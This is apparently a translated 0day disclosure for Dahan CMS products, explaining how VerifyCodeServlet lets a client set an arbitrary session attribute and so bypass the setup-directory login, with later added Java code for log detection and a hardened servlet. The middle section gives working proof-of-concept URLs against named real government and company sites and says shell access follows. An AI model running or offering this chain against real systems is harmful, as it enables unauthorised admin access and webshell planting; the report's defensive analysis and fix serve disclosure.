Dahan Network 0day affecting all systems and versions
Admin backend permission bypass; once in the backend, getting a shell (GetShell) is easy.
Testing confirms that it affects all systems and versions, including jcms, jact, jsearch, vipchat, vc, and xxgk.
I guess this is the most influential vulnerability in Dahan. Please try again!
Session permission bypass in the setup directory:
Code analysis, /jcms/setup/opr_licenceinfo.jsp:

    // obtain the value of cookie_username from the Session and assign it to strUser
    String strUser = (String) session.getAttribute("cookie_username");
    // is strUser null or empty?
    if (strUser == null || strUser.trim().length() == 0) {
        out.println("Log on first!");
        return;   // null or empty means not logged on: return directly
    }
    // non-null means the request is treated as logged on

Note that the only check is whether the session attribute cookie_username is non-empty; nothing verifies how that attribute got there.
Decompiled Java servlet code, /VerifyCodeServlet:

    // obtain the request parameter var and assign it to strVar
    String strVar = Convert.getParameter(request, "var", "");
    if (strVar == null || strVar.length() == 0) {
        // no name supplied: save the random code (str_code) to the SESSION under the default key
        request.getSession().setAttribute("COMPLAT", str_code);
    } else {
        // strVar is not empty: save the random code to the SESSION under the client-supplied name
        request.getSession().setAttribute(strVar, str_code);
    }

Therefore the name of the SESSION attribute that gets created is controlled by the var parameter; str_code is the freshly generated verification code, so the attribute value is always a non-empty string.
Combining the analysis of the two programs:
1. opr_licenceinfo.jsp only requires that the SESSION attribute cookie_username is non-empty to treat the request as logged on.
2. /VerifyCodeServlet can create a SESSION attribute with any name.
Put together, a successful logon can be constructed.
Accessing opr_licenceinfo.jsp directly:
http://www.zgzhijiang.gov.cn/jcms/setup/opr_licenceinfo.jsp
Add a Session attribute named cookie_username:
http://www.zgzhijiang.gov.cn/jcms/VerifyCodeServlet?var=cookie_username
Access /jcms/setup/opr_licenceinfo.jsp again and it now reports a successful logon.
Licence file upload webshell vulnerability, not demonstrated here; refer to: http://wooyun.org/bugs/wooyun-2010-052699
vipchat POC:
http://sdds.gov.cn/vipchat/setup/
http://sdds.gov.cn/vipchat/VerifyCodeServlet?var=cookie_username
http://sdds.gov.cn/vipchat/setup/admin.jsp
jsearch POC:
http://www.hyhjbh.com/jsearch/setup/
http://www.hyhjbh.com/jsearch/VerifyCodeServlet?var=cookie_username
http://www.hyhjbh.com/jsearch/setup/opr_licenceinfo.jsp
Other Dahan systems are not listed one by one.
This is a logic vulnerability in the VerifyCodeServlet component.
Every Dahan system includes VerifyCodeServlet, which is used to generate verification codes,
so all systems are affected and the impact scope is very wide.
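For operators who want to check whether this bypass has been attempted against a Dahan install, the following is an added example (not part of the original report and not Dahan's code). It scans access-log lines for VerifyCodeServlet requests whose var parameter names a session attribute that the setup pages treat as proof of login; cookie_username is the marker from the decompiled code above. The log lines and addresses are constructed; the combined log format and the Java 10+ URLDecoder.decode(String, Charset) overload are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Scans web-server access logs for VerifyCodeServlet requests that plant a login marker. */
public class VerifyCodeServletAudit {

    // Session attribute names the setup pages accept as proof of login.
    // "cookie_username" comes from the decompiled opr_licenceinfo.jsp; extend for your deployment.
    static final List<String> LOGIN_MARKERS = Arrays.asList("cookie_username");

    // Request line of a combined-format access log, e.g. "GET /jcms/VerifyCodeServlet?var=x HTTP/1.1"
    static final Pattern REQUEST_LINE = Pattern.compile("\"(?:GET|POST)\\s+(\\S+)\\s+HTTP/[0-9.]+\"");

    /** Returns the log lines in which the var parameter of VerifyCodeServlet names a login marker. */
    public static List<String> findSessionInjection(List<String> accessLog) {
        List<String> hits = new ArrayList<>();
        for (String line : accessLog) {
            Matcher m = REQUEST_LINE.matcher(line);
            if (!m.find()) continue;
            String target = m.group(1);
            int q = target.indexOf('?');
            if (q < 0) continue;                        // no query string, so no var parameter
            String path = target.substring(0, q);
            if (!path.endsWith("/VerifyCodeServlet")) continue;
            for (String pair : target.substring(q + 1).split("&")) {
                int eq = pair.indexOf('=');
                String name = eq < 0 ? pair : pair.substring(0, eq);
                String value = eq < 0 ? "" : pair.substring(eq + 1);
                if (!name.equals("var")) continue;      // servlet parameter names are case-sensitive
                // decode so that percent-encoded spellings of the marker are caught as well
                String key = URLDecoder.decode(value, StandardCharsets.UTF_8);
                if (LOGIN_MARKERS.contains(key.trim())) {
                    hits.add(line);
                    break;
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed sample lines in combined log format; addresses and timestamps are placeholders.
        List<String> sample = Arrays.asList(
            "203.0.113.5 - - [01/Jan/2015:10:00:01 +0800] \"GET /jcms/VerifyCodeServlet HTTP/1.1\" 200 1321",
            "203.0.113.5 - - [01/Jan/2015:10:00:07 +0800] \"GET /jcms/VerifyCodeServlet?var=cookie_username HTTP/1.1\" 200 1321",
            "203.0.113.5 - - [01/Jan/2015:10:00:09 +0800] \"GET /jcms/setup/opr_licenceinfo.jsp HTTP/1.1\" 200 5120",
            "198.51.100.9 - - [01/Jan/2015:10:01:00 +0800] \"GET /vipchat/VerifyCodeServlet?var=COMPLAT HTTP/1.1\" 200 1321");
        // Only the second line is reported: it writes cookie_username into the session.
        for (String hit : findSessionInjection(sample)) {
            System.out.println("session-injection attempt: " + hit);
        }
    }
}
```

A hit followed shortly by a 200 response on a /setup/ page from the same client address is the full pattern described in this report; an ordinary var=COMPLAT request (the servlet's default key) is not flagged, so the rule produces few false positives on legitimate CAPTCHA traffic.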
Note:
1. On some sites, accessing the setup directory returns 403 (access forbidden).
2. The new Dahan 2015 version is not affected.
Solution:
Fix the logic of the VerifyCodeServlet component so that the client cannot choose the session attribute name.
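As an added illustration of that fix (example code, not Dahan's own), the servlet below stores the verification code only under an allowlisted key, falling back to the default COMPLAT key seen in the decompiled code, so a var=cookie_username request can no longer create a login marker. It also shows the second half of the repair: the setup pages should test a marker that only the login handler sets after checking credentials, rather than the mere presence of cookie_username. The class and method names, the setup_authenticated marker, and the image dimensions are assumptions; the javax.servlet, java.awt and javax.imageio APIs are standard.

```java
import java.awt.Color;
import java.awt.Font;
import java.awt.Graphics2D;
import java.awt.image.BufferedImage;
import java.io.IOException;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import javax.imageio.ImageIO;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

/** Hardened verification-code servlet: the client can no longer choose the session attribute name. */
public class VerifyCodeServletFixed extends HttpServlet {

    // Default key, as in the decompiled code. Additional CAPTCHA contexts must be listed here;
    // a login marker such as cookie_username must never appear in this set.
    static final String DEFAULT_KEY = "COMPLAT";
    static final Set<String> ALLOWED_KEYS = new HashSet<>(Arrays.asList(DEFAULT_KEY));

    // Marker that only the login handler sets, after the password check (hypothetical name).
    static final String AUTH_MARKER = "setup_authenticated";

    private static final String ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789";
    private static final SecureRandom RNG = new SecureRandom();

    /** Session attribute a request may write its CAPTCHA to: an allowlisted name or the default. */
    static String captchaKeyFor(String requestedVar) {
        return (requestedVar != null && ALLOWED_KEYS.contains(requestedVar)) ? requestedVar : DEFAULT_KEY;
    }

    /** Random code from an alphabet without easily confused glyphs (0/O, 1/I). */
    static String newCode(int length) {
        StringBuilder sb = new StringBuilder(length);
        for (int i = 0; i < length; i++) {
            sb.append(ALPHABET.charAt(RNG.nextInt(ALPHABET.length())));
        }
        return sb.toString();
    }

    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String code = newCode(4);
        HttpSession session = request.getSession(true);
        // The var parameter is consulted only through the allowlist; it can never name a login marker.
        session.setAttribute(captchaKeyFor(request.getParameter("var")), code);
        response.setContentType("image/png");
        response.setHeader("Cache-Control", "no-store");
        renderImage(code, response);
    }

    /** Draws the code into a small PNG and writes it to the response body. */
    private static void renderImage(String code, HttpServletResponse response) throws IOException {
        BufferedImage img = new BufferedImage(80, 30, BufferedImage.TYPE_INT_RGB);
        Graphics2D g = img.createGraphics();
        g.setColor(Color.WHITE);
        g.fillRect(0, 0, 80, 30);
        g.setColor(Color.BLACK);
        g.setFont(new Font(Font.SANS_SERIF, Font.BOLD, 20));
        g.drawString(code, 8, 22);
        g.dispose();
        ImageIO.write(img, "png", response.getOutputStream());
    }

    /** What opr_licenceinfo.jsp and the other setup pages should check instead of a non-empty cookie_username. */
    public static boolean isSetupAuthenticated(HttpSession session) {
        return session != null && Boolean.TRUE.equals(session.getAttribute(AUTH_MARKER));
    }

    /** Called by the login handler only after the submitted credentials have been verified. */
    public static void markSetupAuthenticated(HttpSession session, String username) {
        session.setAttribute(AUTH_MARKER, Boolean.TRUE);
        session.setAttribute("cookie_username", username);   // kept for pages that display the user name
    }
}
```

The two halves are independent defences: the allowlist removes the attribute-name injection, and the Boolean marker means that even another attribute-writing bug elsewhere in the application would have to produce exactly Boolean.TRUE under the marker's name to pass the check, which a string-valued CAPTCHA code never does.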